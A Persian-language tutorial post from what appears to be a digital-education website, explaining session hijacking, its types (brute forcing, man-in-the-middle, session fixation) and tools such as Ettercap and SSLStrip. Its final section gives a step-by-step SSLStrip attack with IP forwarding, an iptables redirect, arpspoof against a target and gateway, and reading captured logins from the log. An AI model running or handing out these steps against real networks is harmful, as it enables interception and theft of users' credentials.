یک روز ، یک جمله ...

امروز به هر کاری که قراره انجام بدی، باور داشته باش

×

پیام

Failed loading XML...
15 ارديبهشت

سرقت اطلاعات مطلب ویژه

در این بخش می خواهیم به مفهوم Hijacking و راه و روش های این فرآیند بپردازیم. با ما همراه باشید تا این مبحث جالب را با هم دنبال نماییم.

یکی از مهمترین بحث ها در این فرآیند، ربودن جلسه یا Session Hijacking می باشد. عملیاتی که بسیاری از هکرها به منظور دستیابی به اطلاعات از آن بهره می برند. در کل عمل ربودن به منظور قطع کردن جریان ترافیک در جهت استخراج اطلاعات یا Sniffing می باشد. این فرآیند معمولا به دو صورت انجام می شود. اولین حالت آن روش Passive می باشد که در این روش، سارق اقدام به پیاده سازی عملیات Sniffing به منظور دستیابی اطلاعات از طریق خطوط ارتباطی می کند و روش دوم که روش Active نام دارد، جایگزین شدن سارق به جای هدف و ادامه روند ارتباط با سرویس دهنده می باشد. در روش دوم بسته های امنیتی نصب شده بر روی سیستم نیز نمی توانند تاثیری در روند عملیات داشته باشند.

در ادامه می خواهیم با انواع سرقت ها آشنا شویم:

Brute Forcing

  • Session ID in clear
  • Attempt Multiple Session IDs in URL

Man in the Middle (Most Hijacking)

  • Sniff Traffic
  • Can Add Packets to Existing Session
  • Can Modify Sequence Number to Keep User Connected
  • Can Modify Pay Load

Session Fixation

  • Attacker Determines a Fixed Session ID
  • Trick User (Phishing) Into Clicking Link
  • Attacker Now Have Access To Victim’s Session
  • Occur in Transport layer

موارد ذکر شده در بالا دسته بندی های انواع مختلف سرقت های اطلاعات می باشد که همانطور که مشخص شده است، روش Man in the Middle پر کاربردترین روش سرقت اطلاعات می باشد.

ربودن جلسه یا Session Hijacking :

عملیات ربودن یک جلسه روشی است که به وسیله آن شما می توانید بدون احراز هویت وارد سیستم سرویس دهنده شوید. تصور کنید کاربری را که به طور مثال اطلاعات مربوط به پست الکترونیک خود را وارد کرده و به سیستم ارائه دهنده سرویس پست الکترونیک خود وارد شده است. همانطور که می دانید، این روند در واقع یک جلسه را بین سرویس دهنده و سرویس گیرنده ایجاد می نماید و تا زمانیکه سرویس گیرنده خواهان پایان این جلسه نباشد، این جلسه ادامه خواهد داشت. حال اگر بتوان این جلسه را از کاربر ربود، می توان به سرویس مربوط به سرویس دهنده آن کاربر دسترسی پیدا کرد.

معمولا ربودن جلسه یک فرآیند کم صدایی است و لذا کسی نمی تواند متوجه شود که این عملیات رخ داده است، مخصوصا اگر این عملیات درون شبکه ای رخ دهد که یک شبکه بسیار شلوغی باشد. به منظور ربودن یک جلسه ابزارهای متعددی وجود دارند که در زیر به برخی از آنها اشاره می نماییم:

  • Hamster / Firesheep
  • Ettercap
  • Jugger Nut
  • Hunt (Most Interest)
  • T-Sight
  • Metasploit
  • SSLStrip

از بین ابزارهای ذکر شده در بالا، ابزار SSLStrip مخصوص سرویس دهندگانی است که از پروتکل امن HTTPS استفاده می نماید. این ابزار با هدایت هدف از پروتکل HTTPS به HTTP شرایطی را ایجاد می نماید که هدف، اطلاعات احراز هویت خود را درون یک محیط نا امن وارد نماید و در نهایت این اطلاعات را به محیط امن HTTPS منتقل می نماید. به منظور کار با این ابزار مراحل زیر را انجام دهید:

Echo 1 > /proc/sys/net/ipv4/ip_forward

Iptables –t nat –A PREROUTING –p tcp –destination–port “port number (80 or 443)” –j REDIRECT –to-port “port number (Like 8080)”

Arpspoof –I –eth0 (Network Name) –t “Target IP Address” –r “Gateway IP Address”

Sslstrip –l “Port Number (last number in line 2)”

زمانیکه هدف شما اقدام به استفاده از شرایط احراز هویت خود نماید، شما می توانید موارد وارد شده توسط کاربر را درون فایل Log مربوط به SSLStrip مشاهده نمایید. برای این منظور خطوط 1 تا 3 را متوقف کرده و با استفاده از دستور more sslstrip.log فایل Log را مشاهده نمایید.

رضا اردانه

مدیریت وب سایت آموزش دیجیتال

نظر دادن

خبرنامه

برای دریافت جدیدترین خبرهای سایت در خبرنامه عضو شوید